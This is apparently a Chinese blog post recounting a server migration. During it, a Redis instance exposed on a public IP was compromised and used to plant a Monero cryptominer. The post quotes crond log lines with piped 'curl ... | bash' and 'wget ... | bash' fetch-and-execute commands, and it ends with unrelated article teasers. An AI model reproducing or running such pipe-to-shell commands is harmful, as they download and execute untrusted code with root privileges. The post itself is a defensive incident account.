一不小心,老司機又翻車了

2021-09-04 09:10:45 字數 2884 閱讀 7818

這幾天一直忙著往proxmox集群裡邊遷移服務,進展還是比較順利。通過整合資源,兩個機櫃的伺服器,下架以後,就剩乙個櫃子了,後邊再遷移一下,還能下架一些舊的配置低的伺服器。因為機櫃電源的限制,迫不得已還得下架一台有公網ip的舊伺服器。為了保證可用性,臨時在一台有redis應用的伺服器上繫結了乙個公網ip。然後開始部署keepalived及haproxy,但搞半天,沒把keepalived給安裝上,估計是centos版本的問題。確認了一下,就是不安裝也不影響業務,就暫時不管它,忙別的事情去了。

四台proxomox組成的集群,加上一台交換機,臨時放在另外乙個機櫃裡邊。等下架舊伺服器後,再把這四台伺服器及交換機整合到乙個機櫃。因此整個下午到夜裡,都在折騰這個事情。搬遷的原則是不能停服務,同時擔心機器關機可能會導致proxmox集群崩潰。待去機房的兄弟把舊機器下架後,做如下的安排:

(1) 伺服器拔掉一根電源線,然後插在目標機櫃的插口上。因為是雙電源,而且兩個機櫃是挨著的,只要動作輕柔,可以保證不會斷電停機。

(2) 交換機不是雙電,一斷電集群就可能崩潰。在目標櫃子櫃子放一交換機,加電。從待搬伺服器拔掉乙個網線,插到此交換機;接著拔第二台伺服器的一根網線,也插過來。於此同時,把另外一口的網線拔掉,觀察網路狀態。因為proxmox做了網絡卡繫結(bond),因此這樣操作,也不會導致網路中斷。

確保網線插別的交換機沒問題後,就可以從機架上把伺服器不停機進行搬遷。

搬遷完,聯絡相關人等挨個測試應用,看是否正常,本人也時不時檢視集群負載,也沒有任何波動,一干人等回家散去,放心睡覺。

趕緊登陸系統,一通排查,臥槽,/tmp目錄下有個檔案littletrump!看看這個有沒有建立起監聽.

果然中招!習慣性的檢視/etc/passwd、/home目錄、crontab等,只有crontab存在麻煩,進行編輯,全是一堆亂碼。

用dd鍵狂刪,毫無作用。再用echo> /tmp/ crontab.***x* 清空,也沒有什麼作用。進目錄/var/spool/cron/ ,把root等檔案直接乾掉了事。

那麼問題來了,這個惡意muma是怎麼進來的?又是幹什麼用的呢?

先回答惡意muma是幹啥的。根據排查,得到乙個網域名稱,用瀏覽器訪問,得到如下頁面。

原來是挖礦的,從crond日誌可進一步判斷,是挖門羅幣的。

sep 28 01:20:01 cache crond[10825]: (root) cmd (/usr/lib64/sa/sa1 10 60)

sep 28 01:20:01 cache crond[10826]: (root) cmd (curl -fsslk | bash)

sep 28 01:21:01 cache crond[11156]: (root) cmd (wget -q -o- --no-check-certificate |

bash)

sep 28 01:25:01 cache crond[12391]: (root) cmd (curl -fsslk | bash)

sep 28 01:28:02 cache crond[13532]: (root) cmd (wget -q -o- --no-check-certificate |

bash)

sep 28 01:30:01 cache crond[14258]: (root) cmd (/usr/lib64/sa/sa1 10 60)

sep 28 01:30:01 cache crond[14259]: (root) cmd (curl -fsslk | bash)

sep 28 01:35:01 cache crond[16051]: (root) cmd (curl -fsslk | bash)

sep 28 01:35:01 cache crond[16054]: (root) cmd (wget -q -o- --no-check-certificate |

bash)

sep 28 01:40:01 cache crond[18117]: (root) cmd (/usr/lib64/sa/sa1 10 60)

sep 28 01:40:01 cache crond[18118]: (root) cmd (curl -fsslk | bash)

sep 28 01:42:01 cache crond[18996]: (root) cmd (wget -q -o- --no-check-certificate |

bash)

………………….省略若干……………………….

第二個問題「惡意muma是怎麼進來的呢」?是因為redis監聽位址是0.0.0.0:6379,我昨天為了做keepalived ha,給網絡卡繫結了公網位址。有心人一掃瞄,就發現這個redis版本漏洞,就利於它侵略進來了。

後邊的處理就簡單了。proxmox平台部署一套redis,把備份複製過去,恢復。現有的系統乾掉,重灌系統,另做他用。

更加體系化和例項化的proxmox超融合私有雲實踐系列文章,請移步本人專欄「人人都能玩的私有雲神器-proxmox」,猛戳此處,片刻直達!

一不小心實現了RPC

隨著最近關注 cim 專案的人越發增多,導致提的問題以及 bug 也在增加,在修復問題的過程中難免 潔癖又上來了。看著一兩年前寫的東西總是懷疑這真的是出自自己手裡嘛?有些地方實在忍不住了便開始了漫漫重構之路。在開始之前先簡單介紹一下cim這個專案,下面是它的架構圖 簡單來說就是乙個 im 即時通訊系...

一不小心逾期了,該怎麼辦?

借過款或者用過信用卡的朋友都知道,借的錢雖然花的痛快,但可是要還的。如果不按時還款,還會造成逾期。逾期不僅會給你帶來經濟損失,更重要的是會影響你的信用,以後不僅申請房貸車貸困難,就連出門坐個高鐵飛機也會被 卡 有些人覺得自己借的網路小貸,而這些貸款一般不會上徵信,所以逾不逾期根本不在乎,但事實真的是...

一不小心走上IT這條不歸路

博主已是畢業四年的工作者,回頭想想走過的路,感覺更多的是迷茫和漫無目的。現在是時候該認真考慮以後的路怎麼走,怎麼規劃了。踏進校園的第一天就開始迷茫了,大學的生活想必大多數人都深有體會吧 猶如高考之前煉獄般 缺少自由的困獸一下子脫了韁,回歸大自然。肆意的放縱,揮霍青春,好似對高考的報復。再加上對計算機...